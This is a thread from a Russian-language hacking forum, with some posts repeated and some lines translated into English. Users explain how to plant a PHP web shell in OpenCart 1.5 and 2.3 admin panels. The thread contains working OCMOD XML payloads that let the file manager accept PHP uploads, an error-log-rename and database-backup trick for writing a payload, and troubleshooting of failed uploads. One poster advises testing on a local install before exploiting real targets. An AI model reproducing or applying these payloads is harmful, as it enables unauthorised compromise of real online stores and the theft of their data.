как поставить шел в версии опенкарт 2.3.0.2?
также интересно как поставить в 1.5.5.1
также интересно как поставить в 1.5.5.1
-
XSS.stack #1 – первый литературный журнал от юзеров форума
open cart 2.3.0.2 шелл
- Автор темы ConnectXSS
- Дата начала
Гуглить пробовал? Деательные инструкции на ачате и рдоте висят и легко находятся.
2-3 версия - через модули. Там просто загружается любой желаемый php код.
1 версия - через замену разрешения файла с ошибками на php и, например, заливку пейлоада через бэкап БД.
2-3 версия - через модули. Там просто загружается любой желаемый php код.
1 версия - через замену разрешения файла с ошибками на php и, например, заливку пейлоада через бэкап БД.
- Автор темы
- Добавить закладку
- #3
2.3 через модули дает подгрузить только .xml а как через данный формат подгрузить?я заливал только через архив .ocmod.zip в другой версии
по поводу 1 версии имеешь ввиду в * Error Log Filename:error.txt заменить на error.php? потом через бэкап грузить шелл?так сделал но криво грузится ,пишет Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Error No: 1064
или я туплю?
тыкни пальцем плз)
Последнее редактирование:
Открой документацию, как писать моды, там все понятно станет. Ну или просто какой-нибудь мод скачай.
Принцип общий такой, что в xml указывается, какой участок кода в каком файле ищется, потом свой код и оператор - заменить, добавить перед, добавить после. То есть просто свой мини-шелл или загрузчик подгружаешь куда-нибудь в админку и эксплуатируешь.
<file path="ПУТЬ К ФАЙЛУ">
<operation>
<search><![CDATA[<?php echo $text_version; ?>]]></search> //Что искать
<add position="replace"><![CDATA[<?php phpinfo(); ?>]]></add> //На что заменить
</operation>
</file>
Тут важный момент, после того, как загрузил любой мод, чтобы он сработал - нужно сбросить кэш модулей или как-то так он называется. Не кэш сайта, а именно кэш модулей, там есть кнопка.
SELECT '<?php phpinfo(); ?>' FROM `inexistent_table`
Если все нормально, то загрузится и выполнится в error.php
Поставь OpenServer, поставь ванильные версии и потестируй на них, чтобы понять, как работает, куда загружается и т.д. с доступом к файлам. А потом уже на целях эксплуатируй.
Принцип общий такой, что в xml указывается, какой участок кода в каком файле ищется, потом свой код и оператор - заменить, добавить перед, добавить после. То есть просто свой мини-шелл или загрузчик подгружаешь куда-нибудь в админку и эксплуатируешь.
<file path="ПУТЬ К ФАЙЛУ">
<operation>
<search><![CDATA[<?php echo $text_version; ?>]]></search> //Что искать
<add position="replace"><![CDATA[<?php phpinfo(); ?>]]></add> //На что заменить
</operation>
</file>
Тут важный момент, после того, как загрузил любой мод, чтобы он сработал - нужно сбросить кэш модулей или как-то так он называется. Не кэш сайта, а именно кэш модулей, там есть кнопка.
Потом грузить что-то типа этого:
SELECT '<?php phpinfo(); ?>' FROM `inexistent_table`
Если все нормально, то загрузится и выполнится в error.php
Поставь OpenServer, поставь ванильные версии и потестируй на них, чтобы понять, как работает, куда загружается и т.д. с доступом к файлам. А потом уже на целях эксплуатируй.
Сохрани файл в xml добавит в стандартный файл менеджер загрузку php файлов. Ну а дальше заходишь в редактирование продуктов или банеров Делаешь изменить картинку вместо картинки загружаешь php файл
Код:
<?xml version="1.0" encoding="UTF-8"?>
<modification>
<name>File Manager Sort By Upload Date</name>
<code>File Manager Sort By Upload Date</code>
<version>2.x-3.11</version>
<author>sezerural.com</author>
<file path="admin/controller/common/filemanager.php">
<operation error="log">
<search position="replace"><![CDATA['jpeg',]]></search>
<add><![CDATA['php','jpeg',]]></add>
</operation>
<operation error="log">
<search position="replace"><![CDATA['image/jpeg',]]></search>
<add><![CDATA['image/jpeg','application/x-php',]]></add>
</operation>
</file>
</modification>- Автор темы
- Добавить закладку
- #6
Сохранил в xml,установил через extension installer,обновил кэш в Modifications
зашел в банеры пытаюсь залить ,пишет
Unable to upload "shell.php".
File type not allowed.
я что то не так сделал?
зашел в банеры пытаюсь залить ,пишет
Unable to upload "shell.php".
File type not allowed.
я что то не так сделал?
Стандартный файл менеджер? Гляньте лог модификаторов может там ошибки какие покажет
- Автор темы
- Добавить закладку
- #8
У тебя не стандартный файл менеджер посмотри модификаторы связанные с файл менеджером. И отключи их . Тот что я тебе дал должен называться File Manager Sort или так как ты назвал файл. Потом как зальешь шелл включишь обратно этот файл менеджер.
- Автор темы
- Добавить закладку
- #10
включился File Manager Sort , но при заливке теперь пишет Warning: Incorrect file type!
в логе есть такое:
----------------------------------------------------------------
MOD: File Manager Sort By Upload Date
CODE: 'jpeg',
LINE: 287
CODE: 'image/jpeg',
LINE: 298
А я тебе говорил, поставь себе на комп ванильную версию, на ней все отладь, научись заливать, потом лей на таргете)
В логе все норм. хз даже у меня работает на той же версии. Единственное на что могу подумать у тебя другой mime type у php файла, хотя я проверил у себя несколько php файлов везде application/x-php
Попробуй этот код добавил в него все возможные myme types для php файлов:
Код:
<?xml version="1.0" encoding="UTF-8"?>
<modification>
<name>File Manager Sort By Upload Date</name>
<code>File Manager Sort By Upload Date</code>
<version>2.x-3.11</version>
<author>sezerural.com</author>
<file path="admin/controller/common/filemanager.php">
<operation error="log">
<search position="replace"><![CDATA['jpeg',]]></search>
<add><![CDATA['php','jpeg',]]></add>
</operation>
<operation error="log">
<search position="replace"><![CDATA['image/jpeg',]]></search>
<add><![CDATA['image/jpeg','text/php','text/x-php','application/php','application/x-php','application/x-httpd-php','application/x-httpd-php-source',]]></add>
</operation>
</file>
</modification>2-3 version - through modules. Any desired php code is simply loaded there.
Version 1 - by replacing the permission of a file with errors with php and, for example, uploading a payload through a database backup.
Version 1 - by replacing the permission of a file with errors with php and, for example, uploading a payload through a database backup.